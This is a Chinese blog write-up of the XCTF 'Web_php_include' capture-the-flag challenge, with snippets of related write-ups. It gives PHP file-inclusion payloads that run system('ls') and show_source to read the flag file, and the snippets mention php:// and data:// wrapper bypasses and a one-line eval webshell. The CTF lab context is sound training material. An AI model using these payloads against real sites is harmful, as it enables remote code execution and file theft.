攻防世界web进阶区之Web_php_include

最新推荐文章于 2023-05-22 21:38:28 发布
最新推荐文章于 2023-05-22 21:38:28 发布
阅读量364 收藏
点赞数 1
分类专栏: web CTF 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45756971/article/details/107687479
版权
CTF 同时被 2 个专栏收录
30 篇文章 2 订阅
订阅专栏
web
22 篇文章 0 订阅
订阅专栏

在这里插入图片描述代码审计后我们会发现存在文件包含漏洞。
借助hello参数构建payload:?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>在这里插入图片描述然后借助参数?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>即可得到flag
在这里插入图片描述ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

Blank⁰
关注
专栏目录
攻防世界web高手进阶Web_php_include
llx101388627的博客
03-06 264
攻防世界web高手进阶Web_php_include 进入链接,可以看到部分源码: 分析一下,这里可以用GET方式上传两个参数:hello和page 其中,page会先通过strstr(A,B)函数 [在A中查找是否有B] 检查其中是否有"php://",如果有则会通过str_replace(A,B,C)函数 [将C中所有A替换为B] 将"php://"删去。 所以基本上就不可能用php://伪协议 但可以尝试data://text/plain 我们如果要知道flag在哪里,首先得知道有哪些文件 而要
攻防世界(高手进阶)——Web_php_include
知足且坚定,温柔且上进
02-11 1784
做完此题后参考了其他大佬写的wp,发现方法不同,此题我才用的是通过一句话木马注入。 使用御剑扫一下目录: 发现熟悉的http://111.198.29.45:53486/phpmyadmin/,打开链接: 一般username与password都为root,但此题的username为root,密码为空; 在SQL处写入一句话木马和文件包含: select "<?php eval(@$_P...
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1306
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界web高手进阶 Web_php_include
weixin_61835841的博客
04-25 2003
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 工具 火狐,burpsuite 分析 代码审计: strstr():分大小写 str_replace:替换函数 补充: 函数原型:mixed str_replace ( mixed $search , mixed $replace , mixed $subject [, int &$count ] )参数说明:$search要被搜索替换的字符串,$replace要替换搜索的字符串,$subject操作...
攻防世界web进阶Web_php_include两种解法
hxhxhxhxx的博客
07-16 663
攻防世界web进阶Web_php_include两种解法题目函数知识详解第一种第二种 题目 函数知识 strstr:查找php://在page中的第一次位置,并返回位置参数 str-replace:将page中的php://替换为空 详解 明显一个代码审计的题目 首先,他get一个hello参数,然后输出,并没有实质作用 然后get一个page参数 检测$page参数中是否含有php:// 然后将php://全部替换为空 while无限循环,直到page中没有php://即可, 第一种 我们首先可以使用
攻防世界 web高手进阶 7分题 Web_php_wrong_nginx_config
闵行小鱼塘
08-04 1967
继续ctf的旅程,攻防世界web高手进阶的7分题,本文是Web_php_wrong_nginx_config的writeup
攻防世界web进阶baby_web
gongjingege的博客
07-07 1138
攻防世界web进阶baby_web 2020.7.6 公瑾 题目描述:想想初始页面是哪个 初始页面指index,在地址栏修改1.php改为index.php,发现还是hello world 这时候可以用firefox自带的开发者选项 发现index.php的文件,在消息头发现了flag 或者用burp suite抓包 将信息右键发给repeater 将请求头改为index.php, go, 右边响应发现了隐藏的flag 参考文章:https://blog.csdn.net/zouchengzhi
攻防世界web进阶全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2453
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
攻防世界 web高手进阶 10分题 biscuiti-300
闵行小鱼塘
11-07 1051
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是biscuiti-300的writeup
攻防世界-Web进阶-warmup题解
Jollowin的博客
11-26 834
warmup题解 我们进入到题目界面会看到一张猥琐的笑脸,假装没看到他直接按F12。 这里我们发现了一条线索:source.php。 好家伙,那我们不妨到source.php看一看: 进行代码审计,初步发现我们可以提交一个名为file的变量,若变量file的值为source.php或hint.php则会执行include $_REQUEST[‘file’]。 那我们不妨令file=hint.php看一看。 1.如上图我们发现底部出现了一行提示,那我们现在的目的就变成了让 include $_REQUE
攻防世界web进阶Web_php_include
gongjingege的博客
07-17 638
打开链接,代码审计
攻防世界web进阶_Web_php_include
chy082的博客
08-21 175
代码审计 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { //循环,如果匹配到php://就将其替换成空字符串 $page=str_replace("php://", "", $page); } include($page); ?> 分析源码可知伪协议php://被过滤了,但是可以用其他的伪协议 cat flag文件.php
攻防世界web进阶——Web_php_include
一枚菜鸡
10-18 592
一、基本方法:大小写绕过 考察的是文件包含,page中带有php://的都会被替换成空,str_replace()以其他字符替换字符串中的一些字符(分大小写),strstr() 查找字符串首次出现的位置。返回字符串剩余部分。 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", ""
攻防世界XCTF:Web_php_include
末初的CSDN博客
03-13 881
这里需要绕过strstr()函数查找字符,使用php伪协议,不然会被替换为空。 针对strstr()函数对大小写敏感,绕过使用php://input流 也就是说,如果使用php://input 我们传入的数据就能相当于以post包的形式,传入php变量执行。 Cat fl4gisisish3r3.php查看内容 ...
攻防世界 Web_php_include write up
giaogiao123的博客
02-19 320
首先看题目注意两点 1要get方式提交page 2要绕过strstr()函数,要绕过str_replace函数因为他会把php://换成空 3文件包含(要想到一句话木马) 先补充一些知识关于php://input 因为strstr是对大小写敏感的,用大写PHP绕过检测,同时绕过str_replace函数 strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是...
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
最新发布
等风来
05-22 9986
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4680
ctf学习记录
攻防世界 Web_php_include 解题思路
xj28555的博客
07-07 4201
进入题目 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 当然这题有多种解法,我这里就讲述三种。 第一种 绕过str_replace函数,对渗透测试有点了解的都知道str_replace这个函数及其不安全,可以利用大小写绕过,双写绕过等,这里我用
【XCTF 攻防世界WEB 高手进阶 Web_php_include
weixin_45844670的博客
08-23 1644
目录基础题解本题相关知识点:一题多解:**php文件包含****一句话木马****data://伪协议**data://伪协议+一句话木马 基础题解 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 上面这段
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值